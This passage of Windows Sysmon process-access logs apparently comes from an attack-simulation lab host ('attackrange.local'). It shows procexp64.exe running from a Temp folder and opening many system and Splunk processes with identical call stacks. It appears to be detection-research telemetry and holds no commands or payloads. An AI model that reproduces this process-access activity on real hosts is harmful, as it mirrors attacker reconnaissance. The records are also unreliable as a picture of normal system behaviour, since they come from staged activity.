15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787377Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787376Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787375Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787374Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787373Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787372Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787371Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787370Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787369Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787368Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787367Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787366Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787365Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787364Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787363Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787362Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787361Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787360Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787359Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787358Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787357Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787356Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787355Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787354Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program 